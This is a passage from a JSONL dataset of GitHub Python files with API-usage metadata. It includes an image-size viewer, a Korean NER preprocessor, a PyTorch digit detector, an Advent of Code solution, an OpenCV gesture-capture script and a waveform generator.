"usage_type": "call"}, {"api_name": "datetime.date.today", "line_number": 38, "usage_type": "call"}, {"api_name": "datetime.date", "line_number": 38, "usage_type": "name"}, {"api_name": "datetime.datetime.now", "line_number": 39, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 39, "usage_type": "attribute"}, {"api_name": "torch.eye", "line_number": 46, "usage_type": "call"}, {"api_name": "torch.eye", "line_number": 47, "usage_type": "call"}, {"api_name": "KalmanNet_sysmdl.SystemModel", "line_number": 48, "usage_type": "call"}, {"api_name": "model.f", "line_number": 48, "usage_type": "argument"}, {"api_name": "numpy.sqrt", "line_number": 52, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 53, "usage_type": "call"}, {"api_name": "numpy.load", "line_number": 54, "usage_type": "call"}, {"api_name": "numpy.load", "line_number": 55, "usage_type": "call"}, {"api_name": "torch.from_numpy", "line_number": 56, "usage_type": "call"}, {"api_name": "torch.from_numpy", "line_number": 57, "usage_type": "call"}, {"api_name": "torch.from_numpy", "line_number": 58, "usage_type": "call"}, {"api_name": "torch.from_numpy", "line_number": 59, "usage_type": "call"}, {"api_name": "torch.from_numpy", "line_number": 60, "usage_type": "call"}, {"api_name": "torch.from_numpy", "line_number": 61, "usage_type": "call"}, {"api_name": "os.makedirs", "line_number": 68, "usage_type": "call"}, {"api_name": "Pipeline_EKF.Pipeline_EKF", "line_number": 69, "usage_type": "call"}, {"api_name": "KalmanNet_nn.KalmanNetNN", "line_number": 71, "usage_type": "call"}]}
+{"seq_id": "5115971710", "text": "# -*- coding: UTF-8 -*-\r\n# 批量显示指定位置图片的尺寸以及物理尺寸\r\n\r\nimport os\r\n#导入Pillow的Image类\r\nfrom PIL import Image\r\n\r\n#指定图片位置,形如:C:\\Users\\xxx\\Pictures\r\nimgdir = input(\"请输入图片文件夹地址:\")\r\nallfiles = os.listdir(imgdir)\r\n#用filter()函数过滤仅保留图片格式文件,留下的进入列表\r\ndef file_filter(f):\r\n if f[-4:] in ['.jpg','.png','.bmp']:\r\n return True\r\n else:\r\n return False\r\nimages = list(filter(file_filter,allfiles))\r\n\r\n#用for循环,依次打开所有图片文件夹路径的图片\r\nfor img in images:\r\n #输入的路径+图片文件名得到实际图片路径\r\n imgopen = Image.open(imgdir +\"\\\\\"+ img)\r\n #用max()和min()函数分别获得图片长边和短边大小\r\n lpx = max(imgopen.size)\r\n spx = min(imgopen.size)\r\n #用pillow内置的info获取图片dpi信息,因部分图片不含有dpi,所以先判断是否含有dpi\r\n #dict内置的get()方法,如果key存在,则返回其value,否则返回None\r\n if imgopen.info.get('dpi') != None:\r\n #获取dpi\r\n dpi = max(imgopen.info.get('dpi'))\r\n #厘米和像素转换公式为 px/dpi*2.54,用round函数保留两位小数\r\n lcm = round(lpx/dpi*2.54,2)\r\n scm = round(spx/dpi*2.54,2)\r\n print(img,str(lpx)+\"X\"+str(spx)+\"px\",str(dpi)+\"dpi\"+\" 物理尺寸:\"+str(lcm)+\"X\"+str(scm)+\"cm\")\r\n else:\r\n print(img,str(lpx)+\"X\"+str(spx)+\"px\")\r\n \r\n \r\n", "repo_name": "sxmcody/Bulk-Show-Imagesize", "sub_path": "imageview.py", "file_name": "imageview.py", "file_ext": "py", "file_size_in_byte": 1490, "program_lang": "python", "lang": "zh", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "31", "api": [{"api_name": "os.listdir", "line_number": 10, "usage_type": "call"}, {"api_name": "PIL.Image.open", "line_number": 22, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 22, "usage_type": "name"}]}
+{"seq_id": "16780492452", "text": "#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\nimport pickle, re\n\nimport numpy as np\n\nimport hangulvars, utils\n\nBASE_CODE = hangulvars.BASE_CODE\nCHOSUNG = hangulvars.CHOSUNG\nJUNGSUNG = hangulvars.JUNGSUNG\nNONHANGUL_LIST = hangulvars.NONHANGUL_LIST\nCHOSUNG_LIST = hangulvars.CHOSUNG_LIST\nJUNGSUNG_LIST = hangulvars.JUNGSUNG_LIST\nJONGSUNG_LIST = hangulvars.JONGSUNG_LIST\n\ndef generate_arr_index_target(sen_labelled):\n\tarr_index_target = []\n\tpadding = 0\n\tidx_searched = 0\n\twhile True:\n\t\ttry:\n\t\t\tidx0 = sen_labelled.index(\"<\", idx_searched)\n\t\t\tidx1 = sen_labelled.index(\">\", idx_searched)\n\t\t\tlabel = sen_labelled[idx0:idx1].split(\":\")[1]\n\t\t\t\n\t\t\tarr_index_target.append([idx0 - padding, idx1 - padding - 2 - len(label), label])\n\t\t\t\n\t\t\tidx_searched = idx1 + 1\n\t\t\tpadding += 3 + len(label)\n\t\texcept ValueError:\n\t\t\tbreak\n\n\treturn arr_index_target\n\ndef reformat_data(fpath_data_original):\n\twith open(fpath_data_original) as fo:\n\t\tarr_rec = []\n\t\tline = fo.readline()\n\t\twhile len(line) > 0:\n\t\t\tif line[0] in [\";\",\"$\"]: arr_rec.append(line)\n\t\t\tline = fo.readline()\n\n\t\t# print(range(len(arr_rec), 2))\n\t\tarr_rec_a = []\n\t\tfor i in range(0, len(arr_rec), 2):\n\t\t\tx1 = arr_rec[i][2:].strip()\n\t\t\tx2 = arr_rec[i+1][1:].strip()\n\t\t\tif \"<\" not in x1: arr_rec_a.append([x1,x2])\n\n\t\treturn arr_rec_a\n\t\t# return (count, max(arr_len_seq))\n\ndef write_data_ready(arr_rec_a, fpath_data_ready):\n\tstr_fwrite = \"\"\n\tarr_len_seq = []\n\tcount = 0\n\t\n\tfor rec in arr_rec_a:\n\t\tsen_raw, sen_labelled = rec[0], rec[1]\n\t\t# print(sen_raw, sen_labelled)\n\t\tsen_raw = re.sub(r\"([A-Z])\", \"U\", sen_raw) # Uppercase letters\n\t\tsen_raw = re.sub(r\"([a-z])\", \"L\", sen_raw) # Lowercase letters\n\t\tsen_raw = re.sub(r\"([\\u4e00-\\u9fff])\", \"H\", sen_raw) # Hanja\n\t\tsen_raw = re.sub(r\"([0-9])\", \"D\", sen_raw) # Digits\n\t\tsen_raw = re.sub(r\" \", \"S\", sen_raw) # Whitespace\n\t\t# sen_raw = \"B\" + sen_raw + \"E\"\n\t\t# print(sen_raw)\n\n\t\tarr_index_target = generate_arr_index_target(sen_labelled)\n\t\tfor index_target in arr_index_target:\n\t\t\tstr_fwrite = \"{0}{1};{2};{3};{4}\\n\".format(str_fwrite, sen_raw, index_target[0], index_target[1], index_target[2])\n\t\t\t# print(sen_raw[index_target[0]:index_target[1]], index_target[2])\n\t\t\tarr_len_seq.append(len(sen_raw))\n\t\t\n\t\t\tcount += 1\n\t\t# line = fo.readline()\n\tshape_data = (count, max(arr_len_seq))\n\treturn shape_data, str_fwrite\n\n\ndef digitize_data(fpath, shape_data):\n\tarr_label = ['TI', 'OG', 'PS', 'LC', 'DT']\n\twith open(fpath, \"r\", encoding=\"utf-8\") as fo:\t\t\n\t\tdata = np.zeros(shape=(shape_data[0], shape_data[1]*(3+1) + 5), dtype=np.int32)\n\t\tfor i in range(shape_data[0]):\n\t\t\tline = fo.readline()\n\t\t\tsen_raw = line.split(\";\")[0]\n\n\t\t\t# print(sen_raw)\n\n\t\t\t# Input row\n\t\t\tseq_digitized = []\n\t\t\tfor x in sen_raw: seq_digitized += utils.decompose_syllable(x)\n\t\t\tseq_digitized = np.asarray(seq_digitized, dtype=np.int32)\n\t\t\tzero_filler = np.zeros(shape=(shape_data[1]*3 - seq_digitized.shape[0]))\n\t\t\tX = np.hstack([seq_digitized, zero_filler])\n\n\t\t\t# Clipper\n\t\t\tzeros0 = np.zeros(shape=int(line.split(\";\")[1]))\n\t\t\tones = np.ones(shape=int(line.split(\";\")[2]) - int(line.split(\";\")[1]))\n\t\t\tzeros1 = np.zeros(shape=shape_data[1]- int(line.split(\";\")[2]))\n\t\t\tclipper = np.hstack([zeros0, ones, zeros1])\n\t\t\t\n\t\t\t# Label\n\t\t\tlabel_onehot = [0 for i in range(len(arr_label))]\n\t\t\tlabel_onehot[arr_label.index(line.split(\";\")[3].strip())] = 1\n\t\t\tlabel_onehot = np.asarray(label_onehot, dtype=np.int32)\n\n\t\t\trecord = np.hstack([X, clipper, label_onehot])\n\t\t\tdata[i] = record\n\treturn data\n\nfpath_data_original = \"../../dev-data/sylner/2016klpNER.base_train\"\nfpath_data_raw = \"../../dev-data/sylner/base_train_modified.csv\"\nfpath_data_ready = \"../../dev-data/sylner/base_train_ready.csv\"\nfpath_pickle = \"../../dev-data/sylner/base_train.pickle\"\n\narr_rec = reformat_data(fpath_data_original)\nshape_data, str_fwrite = write_data_ready(arr_rec, fpath_data_ready)\n\nwith open(fpath_data_ready, \"w\", encoding=\"utf-8\") as fo:\n\tfo.write(str_fwrite)\n\ndata = digitize_data(fpath_data_ready, shape_data)\nprint(data.shape)\nutils.write_pickle(data, fpath_pickle)", "repo_name": "sanghunkang/sylner", "sub_path": "preprocess.py", "file_name": "preprocess.py", "file_ext": "py", "file_size_in_byte": 3999, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "hangulvars.BASE_CODE", "line_number": 10, "usage_type": "attribute"}, {"api_name": "hangulvars.CHOSUNG", "line_number": 11, "usage_type": "attribute"}, {"api_name": "hangulvars.JUNGSUNG", "line_number": 12, "usage_type": "attribute"}, {"api_name": "hangulvars.NONHANGUL_LIST", "line_number": 13, "usage_type": "attribute"}, {"api_name": "hangulvars.CHOSUNG_LIST", "line_number": 14, "usage_type": "attribute"}, {"api_name": "hangulvars.JUNGSUNG_LIST", "line_number": 15, "usage_type": "attribute"}, {"api_name": "hangulvars.JONGSUNG_LIST", "line_number": 16, "usage_type": "attribute"}, {"api_name": "re.sub", "line_number": 63, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 64, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 65, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 66, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 67, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 86, "usage_type": "call"}, {"api_name": "numpy.int32", "line_number": 86, "usage_type": "attribute"}, {"api_name": "utils.decompose_syllable", "line_number": 95, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 96, "usage_type": "call"}, {"api_name": "numpy.int32", "line_number": 96, "usage_type": "attribute"}, {"api_name": "numpy.zeros", "line_number": 97, "usage_type": "call"}, {"api_name": "numpy.hstack", "line_number": 98, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 101, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 102, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 103, "usage_type": "call"}, {"api_name": "numpy.hstack", "line_number": 104, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 109, "usage_type": "call"}, {"api_name": "numpy.int32", "line_number": 109, "usage_type": "attribute"}, {"api_name": "numpy.hstack", "line_number": 111, "usage_type": "call"}, {"api_name": "utils.write_pickle", "line_number": 128, "usage_type": "call"}]}
+{"seq_id": "4067216029", "text": "import torch.nn as nn\nfrom typing import List\nfrom canvas import MnistBox, MnistCanvas\nimport torch\n\n\nANCHOR_SIZES = [16,19]\n\n#backbone\nclass NetConv(nn.Module):\n def __init__(self):\n super(NetConv, self).__init__()\n modules = []\n\n modules.append(nn.Conv2d(1, 16, 3, padding=1))\n #modules.append(nn.BatchNorm2d(16))\n modules.append(nn.ReLU())\n modules.append(nn.MaxPool2d(2))\n\n modules.append(nn.Conv2d(16, 256, 3, padding=1))\n #modules.append(nn.BatchNorm2d(256))\n modules.append(nn.ReLU())\n modules.append(nn.MaxPool2d(2))\n\n self.layers = nn.Sequential(*modules)\n\n def forward(self, x):\n x = self.layers(x)\n\n return x\n\nimport torch.nn as nn\n\n\nclass Reshape(nn.Module):\n def __init__(self, *args):\n super(Reshape, self).__init__()\n self.shape = args\n\n def forward(self, x):\n return x.view((x.shape[0],) + self.shape)\n\nclass ClassificationHead(nn.Module):\n def __init__(self, anchors_numbers):\n super(ClassificationHead, self).__init__()\n modules = nn.ModuleList()\n #modules.append(nn.Flatten())\n #modules.append(nn.Linear(32*32*50, anchors_number*10))\n #(batch_size, in_channels= 256, 32, 32)\n per_pixel = 1\n modules.append(nn.Conv2d(in_channels=256, out_channels=(per_pixel*10), kernel_size=1))\n #(1, 961*10, 32, 32)\n #modules.append(Reshape(anchors_number,10))\n #modules.append(nn.Softmax(dim=2))\n\n\n self.layers = nn.Sequential(*modules)\n\n def forward(self, x):\n x = self.layers(x)\n #(1, 961*10, 32, 32)\n x = x.permute(0,2,3,1)\n #(1, 32, 32, 961*10)\n x = x.reshape(-1, 10) \n #(1*32*32*961, 10)\n return x\n\nclass BoxRegressionHead(nn.Module):\n def __init__(self, anchors_numbers):\n super(BoxRegressionHead, self).__init__()\n modules = nn.ModuleList()\n #modules.append(nn.Flatten())\n #modules.append(nn.Linear(32*32*50, anchors_numbers*4))\n per_pixel = 1\n modules.append(nn.Conv2d(in_channels=256, out_channels=per_pixel*4, kernel_size=1))\n #modules.append(Reshape(anchors_numbers, 4))\n self.layers = nn.Sequential(*modules)\n\n def forward(self, x):\n x = self.layers(x)\n #1, filters, 16, 16 = batch_size x liczba x wysoksoc x szeroksoc\n x = x.permute(0, 2, 3, 1)\n #batch_size x wysokoscx szerokosc x liczba_kanalow\n x = x.reshape(-1, 4) # [batch_size x wysoksoc x szeroksoc x liczba_anchorow(15)], 4\n\n return x\n\nclass DigitDetectionModelOutput:\n\n def __init__(\n self,\n anchors: List[MnistBox],\n classification_output: torch.Tensor,\n box_regression_output: torch.Tensor,\n ):\n self.anchors = anchors\n self.classification_output = classification_output\n self.box_regression_output = box_regression_output\n\n\nclass DigitDetectionModel(torch.nn.Module):\n # Should use ANCORS_SIZES\n anchors = []\n def __init__(\n self,\n ):\n super().__init__()\n self.netconv = NetConv()\n self.classification_target = ClassificationHead(10)\n self.box_regression_output = BoxRegressionHead(10)\n for n in range(0, 128//4):\n for m in range(0, 128//4):\n self.anchors.append(MnistBox(m*4 - ANCHOR_SIZES[0]/2, n*4 - ANCHOR_SIZES[1]/2, m*4 + ANCHOR_SIZES[1]/2, n*4+ANCHOR_SIZES[0]/2))\n\n def forward(self, x: MnistCanvas) -> DigitDetectionModelOutput:\n out = self.netconv(x)\n classification_target = self.classification_target(out)\n box_regression_output = self.box_regression_output(out)\n return DigitDetectionModelOutput(self.anchors, classification_target, box_regression_output)\n\n", "repo_name": "matematyk/deep-learning-second-assigment", "sub_path": "model.py", "file_name": "model.py", "file_ext": "py", "file_size_in_byte": 3771, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "torch.nn.Module", "line_number": 10, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 10, "usage_type": "name"}, {"api_name": "torch.nn.Conv2d", "line_number": 15, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 15, "usage_type": "name"}, {"api_name": "torch.nn.ReLU", "line_number": 17, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 17, "usage_type": "name"}, {"api_name": "torch.nn.MaxPool2d", "line_number": 18, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 18, "usage_type": "name"}, {"api_name": "torch.nn.Conv2d", "line_number": 20, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 20, "usage_type": "name"}, {"api_name": "torch.nn.ReLU", "line_number": 22, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 22, "usage_type": "name"}, {"api_name": "torch.nn.MaxPool2d", "line_number": 23, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 23, "usage_type": "name"}, {"api_name": "torch.nn.Sequential", "line_number": 25, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 25, "usage_type": "name"}, {"api_name": "torch.nn.Module", "line_number": 35, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 35, "usage_type": "name"}, {"api_name": "torch.nn.Module", "line_number": 43, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 43, "usage_type": "name"}, {"api_name": "torch.nn.ModuleList", "line_number": 46, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 46, "usage_type": "name"}, {"api_name": "torch.nn.Conv2d", "line_number": 51, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 51, "usage_type": "name"}, {"api_name": "torch.nn.Sequential", "line_number": 57, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 57, "usage_type": "name"}, {"api_name": "torch.nn.Module", "line_number": 68, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 68, "usage_type": "name"}, {"api_name": "torch.nn.ModuleList", "line_number": 71, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 71, "usage_type": "name"}, {"api_name": "torch.nn.Conv2d", "line_number": 75, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 75, "usage_type": "name"}, {"api_name": "torch.nn.Sequential", "line_number": 77, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 77, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 92, "usage_type": "name"}, {"api_name": "canvas.MnistBox", "line_number": 92, "usage_type": "name"}, {"api_name": "torch.Tensor", "line_number": 93, "usage_type": "attribute"}, {"api_name": "torch.Tensor", "line_number": 94, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 101, "usage_type": "attribute"}, {"api_name": "canvas.MnistBox", "line_number": 113, "usage_type": "call"}, {"api_name": "canvas.MnistCanvas", "line_number": 115, "usage_type": "name"}]}
+{"seq_id": "40702920521", "text": "\"\"\" Solution to day 08\n\nLessons from the problem:\n- frozenset saves lifes in unordered pattern matching\n\"\"\"\n\nimport os\nfrom typing import Dict, List, Tuple\n\nfrom aoc2021.utils import measure_time, print_results\n\nDATA_PATH = os.path.join(os.path.dirname(__file__), \"..\", \"data\")\n\n\nSEVEN_SEG_MAP = {\n frozenset(\"abcefg\"): 0,\n frozenset(\"cf\"): 1,\n frozenset(\"acdeg\"): 2,\n frozenset(\"acdfg\"): 3,\n frozenset(\"bcdf\"): 4,\n frozenset(\"abdfg\"): 5,\n frozenset(\"abdefg\"): 6,\n frozenset(\"acf\"): 7,\n frozenset(\"abcdefg\"): 8,\n frozenset(\"abcdfg\"): 9\n}\n\n\ndef count_1_4_7_8(data_list: List[str]) -> int:\n \"\"\" Counts the substrings with specific lengths corresponding to the digits above \"\"\"\n count = 0\n for data in data_list:\n substrings = data.split(\" \")\n for substring in substrings:\n if len(substring) in (2, 3, 4, 7):\n count += 1\n return count\n\n\ndef get_decoding(context: str) -> Dict[str, str]:\n \"\"\" Returns a dictionary with the segment correspondence, given the context (e.g. a -> g) \"\"\"\n all_chars = ('a', 'b', 'c', 'd', 'e', 'f', 'g')\n char_count = {char: 0 for char in all_chars}\n substrings = context.split(\" \")\n for substring in substrings:\n if len(substring) == 2:\n digit_1 = set(substring)\n if len(substring) == 3:\n digit_7 = set(substring)\n if len(substring) == 4:\n digit_4 = set(substring)\n for char in substring:\n char_count[char] += 1\n rev_char_count: Dict[int, set] = {rev_count: set() for rev_count in range(7)}\n for char, count in char_count.items():\n rev_char_count[10 - count].add(char)\n assert len(rev_char_count[4]) == len(rev_char_count[6]) == len(rev_char_count[1]) == 1\n\n encodings = {}\n encodings[\"a\"] = list(digit_7 - digit_1)[0]\n encodings[\"b\"] = list(rev_char_count[4])[0]\n encodings[\"e\"] = list(rev_char_count[6])[0]\n encodings[\"f\"] = list(rev_char_count[1])[0]\n\n encodings[\"c\"] = list(rev_char_count[2] - set(encodings[\"a\"]))[0]\n encodings[\"d\"] = list(digit_4 - {v for k, v in encodings.items() if k in (\"b\", \"c\", \"f\")})[0]\n encodings[\"g\"] = list(rev_char_count[3] - set(encodings[\"d\"]))[0]\n\n decoding_map = {v: k for k, v in encodings.items()}\n assert len(decoding_map) == 7\n assert len(set(decoding_map.keys())) == 7\n assert len(set(decoding_map.values())) == 7\n return decoding_map\n\n\ndef apply_decoding(substrings: List[str], decoding_map: Dict[str, str]) -> List[str]:\n \"\"\" Applies decoding on the data \"\"\"\n decoded_substrings = []\n for substring in substrings:\n decoded_substrings.append(\"\".join([decoding_map[char] for char in substring]))\n return decoded_substrings\n\n\ndef sum_decoded_data(data_list: List[str], context_list: List[str]) -> int:\n \"\"\" Decodes using the context and accumulates the numbers in the data \"\"\"\n all_ints = []\n for data, context in zip(data_list, context_list):\n decoding_map = get_decoding(context)\n substrings = data.split(\" \")\n decoded_substrings = apply_decoding(substrings, decoding_map)\n int_sequence = []\n for substring in decoded_substrings:\n int_sequence.append(SEVEN_SEG_MAP[frozenset(substring)])\n all_ints.append(sum(digit*(10**idx) for idx, digit in enumerate(int_sequence[::-1])))\n return sum(all_ints)\n\n\n@measure_time\ndef get_solution() -> Tuple[int, int]:\n \"\"\" Solution to the problem \"\"\"\n context_list = []\n data_list = []\n with open(os.path.join(DATA_PATH, \"day_08.txt\")) as input_file:\n for line in input_file:\n line = line.rstrip('\\n')\n input_data = line.split(\" | \")\n context_list.append(input_data[0])\n data_list.append(input_data[1])\n\n problem_1 = count_1_4_7_8(data_list)\n problem_2 = sum_decoded_data(data_list, context_list)\n return problem_1, problem_2\n\n\nif __name__ == \"__main__\":\n problem_1, problem_2, duration = get_solution()\n print_results(problem_1, problem_2, duration)\n", "repo_name": "gante/aoc2021", "sub_path": "bin/day_08.py", "file_name": "day_08.py", "file_ext": "py", "file_size_in_byte": 4040, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "os.path.join", "line_number": 12, "usage_type": "call"}, {"api_name": "os.path", "line_number": 12, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 12, "usage_type": "call"}, {"api_name": "typing.List", "line_number": 29, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 54, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 40, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 76, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 76, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 84, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 103, "usage_type": "call"}, {"api_name": "os.path", "line_number": 103, "usage_type": "attribute"}, {"api_name": "aoc2021.utils.measure_time", "line_number": 98, "usage_type": "name"}, {"api_name": "typing.Tuple", "line_number": 99, "usage_type": "name"}, {"api_name": "aoc2021.utils.print_results", "line_number": 117, "usage_type": "call"}]}
+{"seq_id": "7102098411", "text": "import cv2\nimport numpy as np\nimport os\nimport time, math\n# import label_image as labelImg\nfrom subprocess import call\n\nfrom keras.models import load_model\nminValue = 70\n\nx0 = 400\ny0 = 200\nheight = 600\nwidth = 600\nkernel = np.ones((15,15),np.uint8)\nkernel2 = np.ones((1,1),np.uint8)\nskinkernel = cv2.getStructuringElement(cv2.MORPH_ELLIPSE,(5,5))\ncount = 0\nlow_range = np.array([0, 50, 80])\nupper_range = np.array([30, 200, 255])\n\ncounter = 0\ncap = cv2.VideoCapture(0) \n\nwhile True:\n ret, frame = cap.read()\n\n cv2.imshow('frame', frame)\n\n cv2.rectangle(frame, (x0,y0),(x0+width,y0+height),(0,255,0),1)\n roi = frame[y0:y0+height, x0:x0+width]\n \n hsv = cv2.cvtColor(roi, cv2.COLOR_BGR2HSV)\n \n #Apply skin color range\n mask = cv2.inRange(hsv, low_range, upper_range)\n \n # mask = cv2.erode(mask, skinkernel, iterations = 1)\n mask = cv2.dilate(mask, skinkernel, iterations = 1)\n \n #blur\n mask1 = cv2.GaussianBlur(mask, (15,15), 1)\n cv2.imshow(\"Blur\", mask1)\n\n #bitwise and mask original frame\n res = cv2.bitwise_and(roi, roi, mask = mask1)\n # color to grayscale\n res = cv2.cvtColor(res, cv2.COLOR_BGR2GRAY)\n cv2.imshow('res',res)\n\n # time.sleep(2)\n\n \n \n cv2.imwrite(os.path.join('scripts/test',\"frame{:d}.jpg\".format(count)), res) \n\n # print(labelImg.func())\n if counter%50==0:\n os.system(\"python -m scripts.label_image --image=scripts/test/frame0.jpg\")\n #print(result)\n k = cv2.waitKey(5) & 0xFF\n counter+=1\n if k==27:\n break\n\n\ncap.release()\ncv2.destroyAllWindows() \n", "repo_name": "arindam-modak/Gest.ly", "sub_path": "open-cv.py", "file_name": "open-cv.py", "file_ext": "py", "file_size_in_byte": 1580, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 3, "dataset": "github-code", "pt": "31", "api": [{"api_name": "numpy.ones", "line_number": 15, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 15, "usage_type": "attribute"}, {"api_name": "numpy.ones", "line_number": 16, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 16, "usage_type": "attribute"}, {"api_name": "cv2.getStructuringElement", "line_number": 17, "usage_type": "call"}, {"api_name": "cv2.MORPH_ELLIPSE", "line_number": 17, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 19, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 20, "usage_type": "call"}, {"api_name": "cv2.VideoCapture", "line_number": 23, "usage_type": "call"}, {"api_name": "cv2.imshow", "line_number": 28, "usage_type": "call"}, {"api_name": "cv2.rectangle", "line_number": 30, "usage_type": "call"}, {"api_name": "cv2.cvtColor", "line_number": 33, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2HSV", "line_number": 33, "usage_type": "attribute"}, {"api_name": "cv2.inRange", "line_number": 36, "usage_type": "call"}, {"api_name": "cv2.dilate", "line_number": 39, "usage_type": "call"}, {"api_name": "cv2.GaussianBlur", "line_number": 42, "usage_type": "call"}, {"api_name": "cv2.imshow", "line_number": 43, "usage_type": "call"}, {"api_name": "cv2.bitwise_and", "line_number": 46, "usage_type": "call"}, {"api_name": "cv2.cvtColor", "line_number": 48, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2GRAY", "line_number": 48, "usage_type": "attribute"}, {"api_name": "cv2.imshow", "line_number": 49, "usage_type": "call"}, {"api_name": "cv2.imwrite", "line_number": 55, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 55, "usage_type": "call"}, {"api_name": "os.path", "line_number": 55, "usage_type": "attribute"}, {"api_name": "os.system", "line_number": 59, "usage_type": "call"}, {"api_name": "cv2.waitKey", "line_number": 61, "usage_type": "call"}, {"api_name": "cv2.destroyAllWindows", "line_number": 68, "usage_type": "call"}]}
+{"seq_id": "32267266129", "text": "import numpy as np\nimport soundfile as sf\nimport sounddevice as sd\nimport matplotlib.pyplot as plt\n\nclass Wave():\n \n def __init__(self, freq, duration, wave_type = 'empty'):\n self.fs = 44100\n self.freq = freq\n self.time = duration\n self.time_vector = np.linspace(0, self.time, round(self.fs*self.time))\n self.wave = np.zeros_like(self.time_vector)\n self.wave_type = wave_type\n if wave_type == 'sine':\n self.sine()\n elif wave_type == 'square':\n self.square()\n elif wave_type == 'triangle':\n self.triangle()\n elif wave_type == 'sawtooth':\n self.sawtooth()\n \n def sine(self):\n self.wave = 0.5*np.sin(2*np.pi*self.freq*self.time_vector)\n self.wave_type = 'sine'\n \n def square(self):\n half_cycle = round(self.fs/(2* self.freq))\n self.wave = np.hstack((np.ones(half_cycle),(-1)*np.ones(half_cycle)))\n while len(self.wave) <= round(self.time*self.fs):\n cycle = np.hstack((np.ones(half_cycle),(-1)*np.ones(half_cycle)))\n self.wave = np.hstack((self.wave, cycle))\n self.wave = self.wave[:round(self.time*self.fs)]\n \n def triangle(self, harmonics = 10):\n series = np.zeros_like(self.time_vector)\n for i in range(0, harmonics):\n n = (2*i)+1\n arg = 2 * np.pi * self.freq * n\n series += (((-1)**i)*np.sin(arg*self.time_vector))/(n**2)\n self.wave = (8/(np.pi**2)) * series\n \n def sawtooth(self, harmonics = 100):\n series = np.zeros_like(self.time_vector)\n for k in range(1, harmonics):\n arg = 2 * np.pi * self.freq * k\n series += (((-1)**k)*np.sin(arg*self.time_vector))/k\n self.wave = (1/2) - (1/np.pi) * series\n \n def samplerate(self, fs):\n \n if type(fs) != int:\n if type(fs) == float:\n raise TypeError('Please input an integer.')\n else: \n raise TypeError('Please input a valid number.')\n \n if fs < 0:\n raise ValueError('''Frequency must be a positive integer.''')\n \n elif self.freq*2 <= fs:\n self.fs = fs\n \n else: \n raise ValueError('''Frequency value must be two times the\n samplerate due to the Nyquist Theorem.''')\n \n def play(self):\n sd.play(self.wave,self.fs)\n \n def save(self):\n sf.write('wave.wav', self.wave, self.fs)\n \n def plot(self):\n plt.plot(self.time_vector, self.wave)\n plt.xlim(0, 0.02)\n plt.ylim(-1, 1)\n \n \n#------------------------------------TEST------------------------------------#\n\n# freq = 100\n# time = 2\n# wave_type = 'sawtooth'\n# test = Wave(freq, time, wave_type)\n# plt.plot(test.time_vector, test.wave)\n# plt.xlim(0, 0.02)\n\n\n\n \n", "repo_name": "reborafs/py_wave_gen", "sub_path": "wave_class.py", "file_name": "wave_class.py", "file_ext": "py", "file_size_in_byte": 2962, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "numpy.linspace", "line_number": 12, "usage_type": "call"}, {"api_name": "numpy.zeros_like", "line_number": 13, "usage_type": "call"}, {"api_name": "numpy.sin", "line_number": 25, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 25, "usage_type": "attribute"}, {"api_name": "numpy.hstack", "line_number": 30, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 30, "usage_type": "call"}, {"api_name": "numpy.hstack", "line_number": 32, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 32, "usage_type": "call"}, {"api_name": "numpy.hstack", "line_number": 33, "usage_type": "call"}, {"api_name": "numpy.zeros_like", "line_number": 